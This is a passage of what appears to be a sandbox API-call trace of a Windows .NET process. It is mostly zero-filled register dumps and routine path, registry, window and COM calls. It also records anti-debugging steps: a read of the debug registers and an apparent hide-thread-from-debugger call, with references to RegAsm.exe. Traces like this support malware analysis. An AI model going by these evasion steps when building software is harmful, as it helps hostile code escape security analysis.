[98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0127.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x75223, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0127.181] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2555044 | out: Context=0x2555044*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0127.186] NtSetInformationThread (ThreadHandle=0x5a4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0127.187] Sleep (dwMilliseconds=0x800) [0129.400] TerminateThread (hThread=0xfffffffe, dwExitCode=0x0) Thread: id = 4 os_tid = 0xa00 Thread: id = 5 os_tid = 0xa14 Thread: id = 6 os_tid = 0xa24 Thread: id = 7 os_tid = 0x304 Thread: id = 8 os_tid = 0x9b0 Thread: id = 9 os_tid = 0x9a0 Thread: id = 22 os_tid = 0x568 Thread: id = 23 os_tid = 0x56c Thread: id = 24 os_tid = 0x474 [0136.957] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0141.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", nBufferLength=0x105, lpBuffer=0x1fe1e720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", lpFilePart=0x0) returned 0x38 [0141.002] GetLastError () returned 0x2 [0141.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", nBufferLength=0x105, lpBuffer=0x1fe1e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", lpFilePart=0x0) returned 0x38 [0141.579] GetLastError () returned 0x2 [0141.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1fe1e684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0141.936] GetLastError () returned 0x2 [0142.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1fe1e720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0142.607] GetLastError () returned 0x2 [0142.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1fe1e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0142.607] GetLastError () returned 0x2 [0143.133] GetVersionExW (in: lpVersionInformation=0x1f7db118*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1f7db118*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0143.133] GetLastError () returned 0x2 [0143.188] GetVersionExW (in: lpVersionInformation=0x1f7db118*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1f7db118*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0143.188] GetLastError () returned 0x2 [0169.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1fe1df88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0169.582] GetLastError () returned 0x2 [0169.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1fe1dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0169.755] GetLastError () returned 0x2 [0169.756] GetVersionExW (in: lpVersionInformation=0x1f818f50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1f818f50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0169.756] GetLastError () returned 0x2 [0169.813] SetErrorMode (uMode=0x1) returned 0x8001 [0169.878] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1fe1e450 | out: lpFileInformation=0x1fe1e450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1 [0169.879] GetLastError () returned 0x2 [0169.879] SetErrorMode (uMode=0x8001) returned 0x1 [0169.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1fe1dfac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0169.901] GetLastError () returned 0x2 [0169.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1fe1df38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0169.901] GetLastError () returned 0x2 [0180.120] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x1fe1df5c | out: pfEnabled=0x1fe1df5c) returned 0x0 [0183.212] lstrlenW (lpString="䅁") returned 1 [0183.539] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76780000 [0183.603] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0183.708] GetStockObject (i=5) returned 0x1900015 [0183.708] GetLastError () returned 0x0 [0183.790] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0184.146] CoTaskMemAlloc (cb=0x4c) returned 0x1f7c37a8 [0184.146] RegisterClassW (lpWndClass=0x1f818f50) returned 0xc166 [0184.147] GetLastError () returned 0x0 [0184.147] CoTaskMemFree (pv=0x1f7c37a8) [0184.149] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0184.467] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.0.app.0.33c0d9d", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x500b8 [0184.551] SetWindowLongW (hWnd=0x500b8, nIndex=-4, dwNewLong=1999971805) returned 535957026 [0184.611] GetWindowLongW (hWnd=0x500b8, nIndex=-4) returned 1999971805 [0184.901] GetCurrentProcess () returned 0xffffffff [0184.917] GetCurrentThread () returned 0xfffffffe [0184.917] GetCurrentProcess () returned 0xffffffff [0184.973] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1fe1ddf8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1fe1ddf8*=0x254) returned 1 [0184.973] GetLastError () returned 0x0 [0185.688] GetCurrentThreadId () returned 0x474 [0186.433] lstrlenW (lpString="䅁") returned 1 [0186.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x1fe1dd64 | out: phkResult=0x1fe1dd64*=0x698) returned 0x0 [0186.823] RegQueryValueExW (in: hKey=0x698, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x1fe1ddac, lpData=0x0, lpcbData=0x1fe1dda8*=0x0 | out: lpType=0x1fe1ddac*=0x0, lpData=0x0, lpcbData=0x1fe1dda8*=0x0) returned 0x2 [0186.826] RegQueryValueExW (in: hKey=0x698, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x1fe1ddac, lpData=0x0, lpcbData=0x1fe1dda8*=0x0 | out: lpType=0x1fe1ddac*=0x0, lpData=0x0, lpcbData=0x1fe1dda8*=0x0) returned 0x2 [0186.851] RegCloseKey (hKey=0x698) returned 0x0 [0187.222] SetWindowLongW (hWnd=0x500b8, nIndex=-4, dwNewLong=535957346) returned 1999971805 [0187.223] GetWindowLongW (hWnd=0x500b8, nIndex=-4) returned 535957346 [0187.223] GetWindowLongW (hWnd=0x500b8, nIndex=-16) returned 79691776 [0188.553] CallWindowProcW (lpPrevWndFunc=0x773525dd, hWnd=0x500b8, Msg=0x24, wParam=0x0, lParam=0x1fe1e040) returned 0x0 [0188.590] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc16d [0188.591] CallWindowProcW (lpPrevWndFunc=0x773525dd, hWnd=0x500b8, Msg=0x81, wParam=0x0, lParam=0x1fe1e034) returned 0x1 [0188.594] CallWindowProcW (lpPrevWndFunc=0x773525dd, hWnd=0x500b8, Msg=0x83, wParam=0x0, lParam=0x1fe1e020) returned 0x0 [0188.606] CallWindowProcW (lpPrevWndFunc=0x773525dd, hWnd=0x500b8, Msg=0x1, wParam=0x0, lParam=0x1fe1e034) returned 0x0 [0188.607] GetLastError () returned 0x0 [0211.662] GetVersionExW (in: lpVersionInformation=0x1f818f50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1f818f50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0211.662] GetLastError () returned 0x0 [0212.618] CreateBindCtx (in: reserved=0x0, ppbc=0x1fe1ec40 | out: ppbc=0x1fe1ec40*=0x1f8121e8) returned 0x0 [0212.619] IUnknown:QueryInterface (in: This=0x1f8121e8, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e4e8 | out: ppvObject=0x1fe1e4e8*=0x1f8121e8) returned 0x0 [0212.679] IUnknown:QueryInterface (in: This=0x1f8121e8, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1fe1e4a4 | out: ppvObject=0x1fe1e4a4*=0x0) returned 0x80004002 [0212.925] IUnknown:QueryInterface (in: This=0x1f8121e8, riid=0x733f0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1fe1e398 | out: ppvObject=0x1fe1e398*=0x0) returned 0x80004002 [0212.942] IUnknown:AddRef (This=0x1f8121e8) returned 0x3 [0212.943] CoGetContextToken (in: pToken=0x1fe1e330 | out: pToken=0x1fe1e330) returned 0x0 [0212.943] CoGetContextToken (in: pToken=0x1fe1e2f4 | out: pToken=0x1fe1e2f4) returned 0x0 [0212.943] CObjectContext::QueryInterface () returned 0x0 [0212.945] CObjectContext::GetCurrentApartmentType () returned 0x0 [0212.945] Release () returned 0x0 [0212.952] CoGetObjectContext (in: riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 